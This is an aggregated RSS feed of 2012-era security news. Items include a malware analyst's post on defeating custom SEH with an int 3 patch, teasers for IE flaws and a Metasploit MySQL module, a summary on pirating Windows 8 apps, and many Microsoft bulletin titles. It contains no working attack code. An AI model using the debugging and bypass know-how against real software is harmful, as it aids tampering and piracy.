http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx It is common to hear reverse engineers throw around the phrase "forty-thousand hex". To someone unfamiliar with reverse engineering or debugging in Windows, this phrase would probably be interpreted to mean the value 0x00040000. However, when reverse engineers say "forty-thousand hex", they are actually referring to the value 0x00400000. The value 0x00400000 is commonly seen when doing low-level work in Windows because this is the default base address of EXE files compiled by Microsoft's C++ compiler. So why say "forty-thousand hex" instead of "four-hundred-thousand hex"? For starters, the former is easier to say (one less syllable) than the latter. But more importantly, hexadecimal numbers are usually grouped in sets of 2 digits (bytes) instead of in groups of 3 digits as in base 10. As such, a reverse engineer could read 0x00400000 as 0x00,40,00,00. Going from right to left, we have 00 in the tens place, 00 in the hundreds place, and 40 in the thousands place.

==> Circumventing custom SEH

http://malwareanalysis.com/CommunityServer/blogs/geffner/rss.aspx I do most of my malware analysis statically, which is to say that I typically analyze malware by looking at a static disassembly of it as opposed to stepping through it in a debugger. However, sometimes I come across complicated or confusing code that would be easier to understand by walking through it in a debugger. I came across such an example the other day. An important branch decision was being made based on the result of a function that used a stack variable that IDA Pro couldn't represent in a simple way. Here's a snippet from the function:

    mov edx, [ebp+arg_0]
    add edx, 108h
    push edx

I could have traced back in the disassembly to figure out what arg_0 + 108h was really pointing to (it turned out to be a global variable and arg_0 was set by the caller of the caller of this function), but I thought that I could save time by loading the target into a debugger and setting a breakpoint on the code above in order to determine what was actually being pushed. There was a problem, though. This malware launched other instances of itself, and setting a breakpoint on the code above in a debugger didn't work since the parent process never executed that code, only the child instances did. I could have set a breakpoint on CreateProcessA(...), forced it to load the child processes in a suspended state, attached a debugger to the child, then resumed them, but this was more trouble than it was worth. Instead, I opted for another method of attack. I configured my debugger for Just-In-Time (JIT) debugging (see http://support.microsoft.com/default.aspx?scid=kb;en-us;103861) so that I could attach to a crashed process via the Microsoft Application Error Reporting dialog box (also known as "Dr. Watson" -- see http://blogs.msdn.com/oldnewthing/archive/2005/08/10/449866.aspx).

I then overwrote the code above with an int 3 and patched the file, with the expectation that after running the parent program this would crash the child process, cause the Microsoft Application Error Reporting dialog box to pop up, and allow me to attach to the crashed child process. (It should be noted that this was done on an isolated network in a very controlled environment, and with all of our safeguards in place it was practically impossible for the modified malware to get out of our secure lab.) I saved the patched file and ran it, waiting eagerly for the Microsoft Application Error Reporting dialog box to appear. To my surprise, nothing happened. As it turned out, the program was using custom Structured Exception Handling (SEH) routines and because of this the int 3 exception was never passed to the operating system, so the Microsoft Application Error Reporting dialog box never popped up. To remediate this, I changed my int 3 patch to the following:

    mov eax, fs:[0]
    mov [eax+4], 7c8399f3h
    int 3

This effectively overwrote the first exception handler in the SEH chain (see http://www.microsoft.com/msj/0197/exception/exception.aspx) with the default exception handler from kernel32.dll. The address of this handler is of course version-specific; in my case kernel32.dll was US English version 5.1.2600.2180. With this patch in place, the Microsoft Application Error Reporting dialog box popped up for the child process and I was able to attach my debugger and determine the value of arg_0 + 108h from the original code above.

==> FortiExplorer 2.0.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 2.0.0 B1022 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: Mac OS X 10.6, MS Windows 7, MS Windows Vista, MS Windows XP

==> FortiExplorer 1.9.0

http://pub.kb.fortinet.com/rss/firmware.xml FortiExplorer 1.9.0 B1436 and release notes are available for download from the Support site: https://support.fortinet.com This concerns the following models: MS Windows 7, MS Windows Vista, MS Windows XP, Mac OS X 10.6

==> How fair should Google Search be?

http://rgaucher.info/feed/rss2 This is the question that is rising in my mind right now... If you search for "Chrome" with the Google search engine, you will find their browser in the third position. Okay, it's not the first one, but I'm just wondering how possible it is for the brand-new-shiny-buggy browser to be that well referenced in a "classical" manner. Of course, this is under the google.com domain which (the main page) is PageRank 10, but well, I'm really wondering if this was a natural process or if something happened. First off, we can see that, using the search engine, the related pages of google.com/chrome are the different search engines... How come? Shouldn't it be more like Mozilla, Opera... Microsoft IE... ? For instance, if I look for the related pages of yahoo.com/finance I will find financial websites such as NASDAQ, etc. Anyway, if Google can control their search engine like that (and of course it's easy for them to do so...), what is the impact on the fairness of their search engine? The PR seems to be okay as long as there is no business-like interference in the process...

==> Microsoft attempts legal action to disrupt some Zeus botnets

http://rss.techtarget.com/981.xml Legal and technical actions could disrupt some Zeus botnet operations by seizing command-and-control servers in Pennsylvania and Illinois.

==> Claims Based Identity: What does it Mean to You? (Part 3)

http://rss.windowsecurity.com/ In this article we're going to look at claims based identity going forward, in relation to Microsoft's soon-to-be-released operating systems (Windows 8 and Windows Server 2012) and server products (such as SharePoint 2013). We'll also look at claims based identity in Office 365.

==> Claims Based Identity: What does it Mean to You? (Part 2)

http://rss.windowsecurity.com/ In this Part 2 we'll start taking a look at how Microsoft is integrating claims based identity into its products and services.

==> Microsoft Internet Explorer 610 Mouse Tracking

http://securityreason.com/rss/SecurityAlert Topic: Microsoft Internet Explorer 610 Mouse Tracking Risk: Medium Text:Summary: Unprivileged attackers can track your system-wide mouse movements from any IE page, even when the page is unfocused o...

==> Oracle MySQL For Microsoft Windows MOF Execution

http://securityreason.com/rss/SecurityAlert Topic: Oracle MySQL For Microsoft Windows MOF Execution Risk: Medium Text:## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please...

==> Microsoft Internet Explorer 7 Denial Of Service

http://securityreason.com/rss/SecurityAlert Topic: Microsoft Internet Explorer 7 Denial Of Service Risk: Low Text: I want to warn you about Denial of Service vulnerabilities in Internet Explorer. I've found these DoS holes in IE7 already i...

==> Internet Explorer information leakage

http://securityvulns.com/informer/rss.asp?l=EN Page can track any mouse movements, even behind the page. Applications: Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7 (12.12.2012)

==> Microsoft Internet Explorer 7 memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on redirection to data: uri containing some tags. Applications: Windows XP, Windows 2003 Server, Windows Vista (10.12.2012)

==> Secure Application Development

http://securosis.com/feeds/research Secure application development is about building secure software. Most security products offer band-aid protection for existing applications: they filter, block, or proxy communications to/from applications that are incapable of protecting themselves. We want to get away from this “Features first, security second” model and code applications that are self-reliant and can protect themselves. The secure code movement is in its infancy. There are different processes, training programs, and tools to aid the development of secure applications – which we will cover here. We will also reference some of the OWASP and Rugged Software projects.

Papers and Posts
------------
* FireStarter: Agile Development and Security
* Comments on Microsoft Simplified SDL
* Rock Beats Scissors, and People Beat Process
* FireStarter: Secure Development Lifecycle – You’re Doing It Wrong
* Structured Security Program, Meet Agile Process
* FireStarter: For Secure Code, Process Is a Placebo – It’s All about Peer Pressure
* Are Secure Web Apps Possible?
* Clickjacking Details, Analysis, and Advice

Presentations
---------
* Security + Agile = FAIL

Podcasts, Webcasts, and Multimedia
We do not currently have multimedia for this topic.

Vendors
---
We’ll include white and black box analysis, fuzzing, and tools vendors. This list is currently evolving, and we’ll include other firms as time permits.
* Cigital
* HP (SpiDynamics, Fortify)
* IBM (Ounce)
* Veracode
* WhiteHat Security

==> Encryption

http://securosis.com/feeds/research

Papers and Posts
------------
If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)
1. The most important piece of work we’ve published on encryption is Understanding and Selecting a Database Encryption or Tokenization Solution.
2. Your Simple Guide to Endpoint Encryption.
3. Post on the Three Laws of Data Encryption.
4. Format and Datatype Preserving Encryption.
5. Post on When to Layer Encryption.
6. Application vs. Database Encryption.
7. The post Database Media Protection focuses on threats to storage media, and some follow-up comments on Database Media Threats.
8. The Data Security Lifecycle covers encryption during the movement and storage of data.

General Coverage
------------
1. Tokenization Will Become the Dominant Payment Transaction Architecture
2. Visa’s Data Field Encryption
3. Boaz Nails It - The Encryption Dilemma
4. “PIN Crackers” and Data Security, looking at attacks on encryption.
5. Part of the core value of Data Centric Security is the ability to protect data regardless of where it moves or resides, which is facilitated by encryption. This is discussed in Part 1 and Part 2 of the Best Practices for Endpoint Security.
6. An editorial on how parts of the U.S. intelligence community discourage the adoption of encryption, as it is counterproductive to their mission.
7. This post discusses Digital Rights Management (DRM) as it pertains to Cloud Computing and content protection.

Presentations
---------
* Presentation on Data Breaches and Encryption.
* Presentation on Data Protection in the Enterprise. This is a corporate overview.
* This presentation is on Encrypting Mobile Data for the Enterprise.

Podcasts, Webcasts and Multimedia
We do not currently have any multimedia for this topic.

Vendors/Tools
---------
The following is just an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). Being here does not imply any endorsement; this list is simply meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections.

Enterprise/General Encryption Providers
* Certicom
* CheckPoint
* Entrust
* GuardianEdge
* IBM
* nuBridges
* Prime Factors Inc.
* RSA
* SafeNet
* Sophos (Utimaco)
* Symantec (PGP)
* Thales (nCipher)
* TrueCrypt
* Venafi
* Voltage
* Vormetric
* WinMagic

Endpoint Encryption Vendors
* beCrypt
* Credant
* DESLock
* McAfee (SafeBoot)
* Microsoft (BitLocker)
* Namo
* Secude
* Secuware

Database Encryption Vendors
* IBM
* NetLib
* Oracle
* Relational Wizards
* RSA (Valyd)
* SafeNet (Ingrian)
* Sybase
* Thales (nCipher)
* Voltage
* Vormetric

Key Management, Certificate and other tools
* Entrust
* Prime Factors Inc.
* RSA
* Symantec (Verisign)
* Thales

==> Cloud Computing Security

http://securosis.com/feeds/research This section of the research library is dedicated to all things Cloud. Mostly we will cover Cloud Security, but along with this we need to have some understanding of what ‘The Cloud’ actually is, and what the major variations look like. We will also cover SaaS and Virtualization under this space; not because they are ‘The Cloud’, but because they involve a Cloud-like model in many cases. We will be adding a lot of content to this section in the coming weeks.

Papers and Posts
------------
* Rich’s series defining a Cloud Security Data Lifecycle: Introduction, Create, Store, Use, Share, Archive and Delete.
* Securing the Cloud with Virtual Private Storage.
* How The Cloud Destroys Everything I Love about Web Application Security.

Presentations
---------
* Understanding Cloud Security in 30 Minutes or Less!

Podcasts, Webcasts and Multimedia
Chris Hoff co-hosts the Network Security Podcast, and talks about the Microsoft/EM partnership, Liquid Machines and Information Centric Security. Oh, he mentions a few things on ‘The Cloud’ too.

==> More DEF CON 19 News

https://www.defcon.org/defconrss.xml Things are starting to heat up for DEF CON 19! Here are a few of the recent developments:

DEF CON Scavenger Hunt has SPONSORS!! ThinkGeek.com and evilmadscientist.com are confirmed sponsors of the scavenger hunt; they will be offering up prizes and special offers. They won't announce specific prizes until DEF CON, but the good news is we know that ThinkGeek will be offering a discount code, usable for ordering off their website during the convention, limited time offer! The coupon code for ThinkGeek DEF CON attendees will be made available at the Scavenger Hunt table in the contest area and will be announced via our twitter feeds @_Defcon_ and @defconscavhunt. Here is a throwback to the past! Check out this Scavenger Hunt list from 14 years ago! We hope you enjoy a little nostalgia from DEF CON 5 courtesy of Mike Schrenk!

Skytalks CFP is Open! From the DEF CON Forums: TLDR: Who: You What: Skytalks IV CFP When: Now - CFP Closes 23:59:59 MDT (UTC-06) 31 May 2011 Why: Because you've got the warez to share Where: dcskytalks@gmail.com - WE RESERVE THE RIGHT TO POINT AND LAUGH IF WE CAN'T READ YOUR bleep IN A TEXT EDITOR. THIS MEANS YOU, MICROSOFT WORD USERS. Updates: http://is.gd/5Y8eyM Back by popular demand, Skytalks returns for its fourth year of technical prowess, side-track talks, and semi-coherent rants by some of the legends of the community. Never mind that we aren't actually IN a skybox this year, we'll still fill it to capacity, have lines running down the hallways for three talks in advance, and we'll recapture that original Defcon spirit and party like it's 1992. (Read on) You can track the movements of Skytalks on Facebook and Twitter as well: Facebook: http://is.gd/0d8skZ Twitter: @dcskytalks

DC101 Site: You can keep up on what's happening with DEF CON 101 by checking out the new site at http://defcon.stotan.org/dc101/

DEF CON 19 Vendor Area! The vendor area at DEF CON 19 is growing by 1000 sq. ft. this year, so all of your favorite vendors will be back and maybe a few new ones! If you are interested in becoming a Vendor at DEF CON, Roamer has posted the updated Vendor FAQ at: http://defcon.hackingyour.net/vendor-FAQ.html As always, you can keep up on all of the latest DEF CON 19 news at https://www.defcon.org, the DEF CON RSS Feed, the DEF CON Twitter, or on the DEF CON Facebook Page!

==> Todd Moore, Treasure hunter contestant, spoke at DEFCON 12 on "Cracking Net2Phone"

https://www.defcon.org/defconrss.xml Since Todd has been announced as a participant on NBC's new show "Treasure Hunters" we have had more than enough curious folks interested in his presentation. We will be watching him on the new show when it airs; in the meantime you can watch him now in his Defcon 12 "Cracking Net2Phone" presentation. Do you think using Internet Telephony is more secure than a regular phone? Think again! Internet Telephony is becoming more common, and those that think it is safer from wiretaps than regular phone communications are wrong. This presentation will demonstrate how to decrypt Net2Phone's dialed phone numbers, and play back fully reconstructed audio conversations from network packet captures. Included will be a demonstration of NetWitness 5.0's VOIP playback capability. Todd Moore is the product manager of NetWitness, a commercially available cyber-forensics tool. Moore's extensive knowledge of Internet technologies, network security, and software development helped make NetWitness well-known for providing powerful insight into network traffic. Moore has over ten years of professional experience in the field of network security and has extensive experience developing commercial software applications. He has a bachelor's degree in Computer Science from Old Dominion University and is a Microsoft Certified Solution Developer (MCSD). Moore started with CTX Corporation in 1996 securing global intranets and designing network security software to help audit and analyze network traffic. He joined Forensics Explorers, a Division of ManTech ISandT, as Director of Software Development in 1999 and later became the NetWitness Product Manager. Moore teaches classes on designing quality software and has made numerous television appearances presenting the latest in technology trends. He has two patent-pending inventions in the field of cyber-forensics. Moore resides in the greater Washington, D.C. area.

==> AMD video drivers prevent the use of the most secure setting for Microsoft's Exploit Mitigation Experience Toolkit (EMET)

http://www.cert.org/blogs/vuls/rss.xml Microsoft EMET is an effective way of preventing many vulnerabilities from being exploited; however, systems that use AMD or ATI video drivers do not support the feature that provides the highest amount of protection.

==> CERT Failure Observation Engine 1.0 Released

http://www.cert.org/blogs/vuls/rss.xml Hello, this is David Warren from the CERT Vulnerability Analysis team. In May 2010, CERT released the Basic Fuzzing Framework, a Linux-based file fuzzer. We released BFF with the intent to increase awareness and adoption of automated, negative software testing. An often-requested feature is that BFF support the Microsoft Windows platform. To this end, we have worked to create a Windows analog to the BFF: the Failure Observation Engine (FOE). Through our internal testing, we've been able to help identify, coordinate, and fix exploitable vulnerabilities in Adobe, Microsoft, Google, Oracle, Autonomy, and Apple software, as well as many others. Our office shootout post is a good example of this testing.

==> Necurs Rootkit Spreading Quickly, Microsoft Warns

http://www.darkreading.com/rss/all.xml Necurs found on more than 83,000 machines; Microsoft report calls rootkit a "prevalent threat"

==> 'Project Mayhem' Hacks Accounting Software

http://www.darkreading.com/rss/all.xml No exploit required for defrauding Microsoft and other accounting systems, researchers at Black Hat Abu Dhabi reveal

==> Microsoft Releases Critical IE, Word Fixes on Year's Final Patch Tuesday

http://www.eweek.com/rss-feeds-45.xml Five of the seven bulletins issued this month are rated "critical," Microsoft's most severe rating.

==> Microsoft Patch Tuesday Ensnares Windows RT Users

http://www.eweek.com/rss-feeds-45.xml Now that Microsoft's ARM-based Surface tablets are on the market, users will have to get accustomed to the monthly routine of Patch Tuesday.

==> Microsoft Can Retain Control of Zeus Botnet Under Federal Court Order

http://www.eweek.com/rss-feeds-45.xml A federal court grants Microsoft permission to keep two major Zeus banking fraud botnets down for the next two years to allow more time to clean up trojan-infected computers.

==> Windows Phone 8 gets its first update

http://www.hackinthebox.org/backend.php http://cdn.wpcentral.com/sites/wpcentral.com/files/styles/large/public/field/image/2012/12/FIrst%20OTA%20Update%20SMS%20Rej.jpg So, last night, Windows Phone 8 got its first update - specifically for the HTC 8X. In this day and age, where iOS is the gold standard and shows the industry how it ought to be done, and Android is the exact opposite, Windows Phone 7 was a bit of an in-between - every phone got every update, but the staggered rollout was slow and frustrating, often due to carrier meddling. How will Windows Phone 8 fare? Tags: Microsoft, WP8

==> In bringing Office to iOS, Microsoft is playing a dangerous game

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2012/12/office-ipad-640x496.jpg It's still not official, but the evidence that Microsoft is bringing Office to the iPad and iPhone is growing in abundance. At this point, it seems to be an inevitability that Redmond will release Office apps for iOS in some form in early 2013, with Android apps following soon after. Tags: Microsoft, Office, iOS

==> Cached Windows passwords sound risky -- but aren't

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/bwa32/6607434907/in/set-72157628651915739 I deal with a lot of customers who are worried about Windows password attacks. These days, the biggest fear is of pass-the-hash attacks, a topic I've written about many times in the past couple of years. Often, when customers voice concern about pass-the-hash attacks, they ask me about cached log-ons in Windows. They've heard about the vulnerability and have read one or more whitepapers about it. Even Microsoft recommends disabling cached log-ons. In fact, cached Windows log-ons aren't a big risk at all. I'll tell you why in a minute, but first, let's review the basics. Tags: Security, Windows, Microsoft

==> Engineer Shows How To Pirate Windows 8 Metro Apps, Bypass In-app Purchases

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Windows_8 This article is a follow-up to my previous 2011 article on Reverse Engineering and Modifying Windows 8 apps. In this article we'll see how to use innate Windows 8 security attack vectors in such a way that could compromise the Windows 8 games revenue stream. We'll review real-world examples for all Win8 programming languages and frameworks. Tags: Security, Software-Programming, Windows 8, Microsoft

==> Microsoft Defends Hiring Foreign Workers

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Microsoft says it has 34% more open engineering positions than this time last year, and can't fill them all domestically.

==> Valley View: Windows Phone 8 Up Close

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Our most recent episode of Valley View took a deeper look at Windows Phone 8 with Microsoft's Greg Sullivan and checked out some intriguing startups. See all the highlights.

==> Microsoft Warns Necurs Rootkit Spreading Quickly

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Necurs found on more than 83,000 machines; Microsoft report calls rootkit a "prevalent threat."

==> Microsoft tackles click-fraud in online advertising

http://www.infosecurity-magazine.com/rss/news/ Microsoft is teaming up malware researchers with its online advertising fraud experts in order to tackle a rising tide of online click-fraud.

==> Extreme full-disclosure hijacks hundreds of Pakistani websites

http://www.infosecurity-magazine.com/rss/news/ News broke on Saturday that Google Pakistan had been hacked. In fact, it was just one of more than 280 Pakistan websites, including those of Microsoft, HP, HSBC, Apple, PayPal and other major companies, that had their DNS hijacked to point to the hackers' own domain.

==> Critical Updates for Flash Player, Microsoft Windows

http://www.krebsonsecurity.com/feed/ Adobe and Microsoft have each released security updates to fix critical security flaws in their software. Microsoft issued seven update bundles to fix at least 10 vulnerabilities in Windows and other software. Separately, Adobe pushed out a fix for its Flash Player and AIR software that address at least three critical vulnerabilities in these programs.

==> IT Compliance Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This Solution Accelerator can help you shift your governance, risk, and compliance (GRC) efforts from people to technology. Use its configuration guidance to help efficiently address your organization's GRC objectives. See the online job aids for compliance.

==> Microsoft Operations Framework (MOF) 4.0

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml MOF 4.0 delivers practical guidance for everyday IT practices and activities, helping users establish and implement reliable, cost-effective IT services for governance, risk, and compliance (GRC) activities.

==> Security Compliance Management Toolkit

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml This toolkit provides proven methods that your organization can use to effectively monitor the compliance state of recommended security baselines for Windows Vista, Windows XP Service Pack 2 (SP2), and Windows Server 2003 SP2.

==> Security Risk Management Guide

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Security Risk Management Guide helps customers plan, build, and maintain a successful security risk management program.

==> SQL Server 2008 Compliance Guidance

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The SQL Server 2008 Compliance Guidance white paper is a complement to the SQL Server 2008 compliance software development kit (SDK).

==> Microsoft Security Assessment Tool

http://www.microsoft.com/feeds/TechNet/en-us/compliance/features.xml The Microsoft Security Assessment Tool (MSAT) consists of more than 200 questions designed to help identify and address security risks in IT environments. It includes best practices, standards such as ISO 17799, 27001 and NIST-800.x, as well as recommendations from the Microsoft Trustworthy Computing Group.

==> MS12-083 - Important : Vulnerability in IP-HTTPS Component Could Allow Security Feature Bypass (2765809) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-082 - Important : Vulnerability in DirectPlay Could Allow Remote Code Execution (2770660) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-081 - Critical : Vulnerability in Windows File Handling Component Could Allow Remote Code Execution (2758857) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-080 - Critical : Vulnerabilities in Microsoft Exchange Server Could Allow Remote Code Execution (2784126) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-079 - Critical : Vulnerability in Microsoft Word Could Allow Remote Code Execution (2780642) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-078 - Critical : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2783534) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-077 - Critical : Cumulative Security Update for Internet Explorer (2761465) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for December 2012 - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2755801): Update for Vulnerabilities in Adobe Flash Player in Internet Explorer 10 - Version: 5.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-060 - Critical : Vulnerability in Windows Common Controls Could Allow Remote Code Execution (2720573) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-059 - Important : Vulnerability in Microsoft Visio Could Allow Remote Code Execution (2733918) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for August 2012 - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-050 - Important : Vulnerabilities in SharePoint Could Allow Elevation of Privilege (2695502) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-043 - Critical : Vulnerability in Microsoft XML Core Services Could Allow Remote Code Execution (2722479) - Version: 4.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for July 2012 - Version: 5.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-073 - Moderate : Vulnerabilities in Microsoft Internet Information Services (IIS) Could Allow Information Disclosure (2733829) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-058 - Critical : Vulnerabilities in Microsoft Exchange Server WebReady Document Viewing Could Allow Remote Code Execution (2740358) - Version: 2.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-074 - Critical : Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2745030) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-072 - Critical : Vulnerabilities in Windows Shell Could Allow Remote Code Execution (2727528) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for November 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-076 - Important : Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2720184) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-075 - Critical : Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2761226) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-071 - Critical : Cumulative Security Update for Internet Explorer (2761451) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2749655): Compatibility Issues Affecting Signed Microsoft Binaries - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-062 - Important : Vulnerability in System Center Configuration Manager Could Allow Elevation of Privilege (2741528) - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-046 - Important : Vulnerability in Visual Basic for Applications Could Allow Remote Code Execution (2707960) - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2269637): Insecure Library Loading Could Allow Remote Code Execution - Version: 18.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-034 - Critical : Combined Security Update for Microsoft Office, Windows, .NET Framework, and Silverlight (2681578) - Version: 1.5

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-066 - Important : Vulnerability in HTML Sanitization Component Could Allow Elevation of Privilege (2741517) - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for October 2012 - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-055 - Important : Vulnerability in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2731847) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-054 - Critical : Vulnerabilities in Windows Networking Components Could Allow Remote Code Execution (2733594) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-053 - Critical : Vulnerability in Remote Desktop Could Allow Remote Code Execution (2723135) - Version: 2.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-070 - Important : Vulnerability in SQL Server Could Allow Elevation of Privilege (2754849) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-069 - Important : Vulnerability in Kerberos Could Allow Denial of Service (2743555) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-068 - Important : Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2724197) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-067 - Important : Vulnerabilities in FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution (2742321) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-065 - Important : Vulnerability in Microsoft Works Could Allow Remote Code Execution (2754670) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-064 - Critical : Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (2742319) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2661254): Update For Minimum Certificate Key Length - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2737111): Vulnerabilities in Microsoft Exchange and FAST Search Server 2010 for SharePoint Parsing Could Allow Remote Code Execution - Version: 3.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-035 - Critical : Vulnerabilities in .NET Framework Could Allow Remote Code Execution (2693777) - Version: 2.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-061 - Important : Vulnerability in Visual Studio Team Foundation Server Could Allow Elevation of Privilege (2719584) - Version: 1.1

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-063 - Critical : Cumulative Security Update for Internet Explorer (2744842) - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2757760): Vulnerability in Internet Explorer Could Allow Remote Code Execution - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Summary for September 2012 - Version: 2.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2736233): Update Rollup for ActiveX Kill Bits - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> MS12-045 - Critical : Vulnerability in Microsoft Data Access Components Could Allow Remote Code Execution (2698365) - Version: 1.3

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2728973): Unauthorized Digital Certificates Could Allow Spoofing - Version: 1.2

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> Microsoft Security Advisory (2743314): Unencapsulated MS-CHAP v2 Authentication Could Allow Information Disclosure - Version: 1.0

http://www.microsoft.com/technet/security/bulletin/RssFeed.aspx?snscomprehensive

==> The WOW-Effect: Imho something the IT-Security community should be aware of ...

